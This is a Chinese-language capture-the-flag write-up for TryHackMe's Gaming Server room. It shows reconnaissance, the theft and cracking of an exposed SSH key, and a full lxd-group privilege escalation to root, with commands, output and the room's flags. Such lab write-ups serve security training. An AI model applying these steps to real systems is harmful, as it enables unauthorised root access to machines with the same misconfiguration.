8

【Tryhackme】Gaming Server(敏感信息泄露,lxd组用户提权)

 2 years ago
source link: https://segmentfault.com/a/1190000040742769
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

【Tryhackme】Gaming Server(敏感信息泄露,lxd组用户提权)

发布于 13 分钟前
┌──(root💀kali)-[~]
└─# nmap -sV -Pn 10.10.77.110    
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-26 06:09 EDT
Nmap scan report for 10.10.77.110
Host is up (0.32s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.63 seconds
┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt -t 100 -u http://10.10.78.156

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 220521

Error Log: /root/dirsearch/logs/errors-21-09-26_22-15-41.log

Target: http://10.10.78.156

[22:15:41] Starting: 
[22:15:43] 200 -    3KB - /
[22:15:45] 301 -  314B  - /uploads  ->  http://10.10.78.156/uploads/
[22:16:05] 301 -  313B  - /secret  ->  http://10.10.78.156/secret/
[22:21:29] 403 -  277B  - /server-status

在/uploads/页面找到一个字典文件dict.lst

下载下来:wget http://10.10.77.110/uploads/dict.lst

在/secret/找到ssh的私钥文件

下载到本地备用:wget http://10.10.77.110/secret/secretKey

用john破解上面的私钥

┌──(root💀kali)-[~/tryhackme/GamingServer]
└─# locate ssh2john.py
/usr/share/john/ssh2john.py
                                                                                                                                                                                                                                            
┌──(root💀kali)-[~/tryhackme/GamingServer]
└─# /usr/share/john/ssh2john.py secretKey >crack
                                                                                                                                                                                                                                            
┌──(root💀kali)-[~/tryhackme/GamingServer]
└─# cat crack    
secretKey:$sshng$1$16$82823EE792E75948EE2DE731AF1A0547$1200$4fbf85fb78a59b915c159c76e269ebba0318e39e6f238eb5ce231be0d624f58255e6ec1caf1e107e53f6436564f298711f83fe3cb6fbf6709cd12ac138f065074577a632c96dfda129b65acc52edab816366aeba68b2c8af6751c3be0ccc748c1739c523b8ecc581703d4a99b64cf9b13717d5a7dc87e214e7f21de334d3b023bcaaab3aaafe5090c5d51acefb1769122da7f1d2625d72ebbfe5a477363355b65b8a672897227b245e20b4d7e627864aa3978232edf1339f6a999ca28f54fbfcf739440a31114b2b1b50a61c7271649c1d43c2e244c43fdeac64622c160e1ae31ab5cf84a1a80a906a52666e05b5c20e22bc317b20a1237daf26cf56f773d4a8732008919712963bfc834c5106a10dfdf09e5561042d745161fda6220eba934d4a48d26eb2313a058984872913d04b5541389dd00c8b7b74e4c635534928effbef8739dd79971685527749d708031e20ff90ff62a70bb6dfed29b2f2bb2820936dcdceeb299db530656a28e5fbe0fa312046e77dd2ce1d0d630451119d0765adc3bb982458638a3c3cb70f16c1a3c71d0798b4782bb708660bf80b8f583102ae77d900209971a86b35dddc878546d181ebe1cb0e5f15443cf5ff889985a7c30b682284a7963a398b87cdd0a8ac1ae2cd57201e8128f652fce83233844c9cddee666bf5ac33cbfb4cb3b7a03904710d5df90d7c5591590c6f2ad8869522e6cb03cfe4e1e7bf49b36f5e901b412cd453e5c615721edfd62a569565f4ddac99de4e7f14bb7bd9f363057fe7af6dd30f64cc7d5dcdc8c7bfe115e23109da0c3788baf01a1915005ca0968eb9f9cb9130b4847c4ded3fedfd0bdc688b1648559d830c276056899dc1de123eddd619e6b008a26fbf437f2dfce3f9678d932d5f5357204821cd08f981af131671def2e983371e42ab91a960dd4152d7d6158aad906727bf32d224cd3b44082a03e48f018f250a75def2037e36fffdfbffbfba279f785b4e9aba435369117ebf49859631f5390bc13a8e3f45d68eab9f58d1085d7229c1715cb6965a110702e342e96c11930e25564d0cb1f00b88e9839f22dfa4eb87c6aed7e358f56fdf218e2668aa40e6bcfe90c682d34f827266145ac1cb6777ecacd2a0da5395799e4ff76b91e4da3fa616453cfc21e83e7e656db2041e959438e26872d2f138f28f762b18f7b8007a8d9a7c8f18000a970d06dde2b20ec7fddabaa18893b4226b2f721cb53ac4b815bc804dfb51b491a93ba3f45a32fb29c698d3f1e4741e0b968efc6a1e487d057a54e47102a20c3c47abb98b3096493b4a2a7497ece89b7f24ee20cdd061dc9b74801a0a9d731563b3f9bbc75aff8b15fa4244f7dc7b0e1f185e78f502cda063e30c40756ebc2a67c1147b5cb98af058f74d953e5872b93fa5b97cb2bbbb7315b757aa1337f6ea58216e71149f5eca2aef9543a11d20f2f5e741d292ce55fb67c2f094d0d5f977ac8f6fa303cfb82f1a363f9042ee66eb903952b9abf18d35fd68ea9f6c02eeea71cedea134120c6dc36b9dd66483cd1f78a67c443ef013b131965da1bf748130c093e59ac116ae7889ad28853850f219253ea62175279b910b54e473d887e10bfef5352fd3df1afd338a9b2d81b2c53923e9f869a49674698a1697686617b2829f5ef03118254885b6962c0a790326c88971f2056b1b85b49130af8f
                                                                                                                                                                                                                                            
┌──(root💀kali)-[~/tryhackme/GamingServer]
└─# john crack --wordlist=/root/tryhackme/GamingServer/dict.lst                                                                                                                                                                       130 ⨯
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
letmein          (secretKey)
1g 0:00:00:00 DONE (2021-09-26 06:26) 100.0g/s 22200p/s 22200c/s 22200C/s 2003..starwars
Session completed

密码是:letmein

用户名是什么?

我们在首页源代码看到这样一行注释:

john, please add some actual content to the site! lorem ipsum is horrible to look at.

所以john是一个开发人员,我们用john做用户名,letmein作为密码登陆远程ssh

┌──(root💀kali)-[~/tryhackme/GamingServer]
└─# ssh -i id_rsa [email protected]
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-76-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Sep 27 02:31:31 UTC 2021

  System load:  0.01              Processes:           98
  Usage of /:   41.4% of 9.78GB   Users logged in:     0
  Memory usage: 20%               IP address for eth0: 10.10.78.156
  Swap usage:   0%


0 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Mon Sep 27 02:31:18 2021 from 10.13.21.169
john@exploitable:~$ pwd
/home/john
john@exploitable:~$ ls
user.txt
john@exploitable:~$ cat user.txt
a5c2ff8b9c2e3d4fe9d4ff2f1a5a6e7e

成功拿到user.txt

传linpea,发现可以用lxd提权

什么是lxd

LXD着重在于系统容器,也叫基础设施容器。 即一个LXD容器上运行了一个完整的Linux系统,和它跑在物理机或者虚拟机上面时几乎一模一样。 这些容器基于一个干净的发行版镜像,长期运行。 传统的配置管理和部署工具都可以和LXD容器一起使用,这和你在虚拟机、云实例或者物理机上面使用时一样

如何利用lxd提升系统权限

参考linpea给出的这篇文章

我们首先在 攻击机把容器下载到本地,并且编译成一个镜像文件

# build a simple alpine image
git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
sudo ./build-alpine -a i686

然后用python开启一个http服务,把镜像文件传到靶机

john@exploitable:/tmp$ wget http://10.13.21.169:8000/alpine-v3.8-i686-20210926_2341.tar.gz
--2021-09-27 03:57:58--  http://10.13.21.169:8000/alpine-v3.8-i686-20210926_2341.tar.gz
Connecting to 10.13.21.169:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2684439 (2.6M) [application/gzip]
Saving to: ‘alpine-v3.8-i686-20210926_2341.tar.gz’

alpine-v3.8-i686-20210926_2341.tar.gz                      100%[========================================================================================================================================>]   2.56M   624KB/s    in 4.2s    

2021-09-27 03:58:03 (624 KB/s) - ‘alpine-v3.8-i686-20210926_2341.tar.gz’ saved [2684439/2684439]

创建一个容器,并且把靶机根目录挂载到/mnt/root下

john@exploitable:/tmp$ lxc image import ./alpine-v3.8-i686-20210926_2341.tar.gz --alias myimage
Image imported with fingerprint: a4b76201ae71d9a5e56acf1263f61546a77a4086779729bb254d47cd24cb6829
john@exploitable:/tmp$ lxc init myimage ignite -c security.privileged=true
Creating ignite
john@exploitable:/tmp$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignite

进入容器,这样我们就可以在容器的/mnt/root下访问到靶机目录

john@exploitable:/tmp$ lxc start ignite
john@exploitable:/tmp$ lxc exec ignite /bin/sh
~ # id
uid=0(root) gid=0(root)
~ # cd /mnt/root/
/mnt/root # ls
bin             cdrom           etc             initrd.img      lib             lost+found      mnt             proc            run             snap            swap.img        tmp             var             vmlinuz.old
boot            dev             home            initrd.img.old  lib64           media           opt             root            sbin            srv             sys             usr             vmlinuz
/mnt/root # cd root/
/mnt/root/root # ls
root.txt
/mnt/root/root # cat root.txt 
2e337b8c9f3aff0c2b3e8d4e6a7c88fc
/mnt/root/root #

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK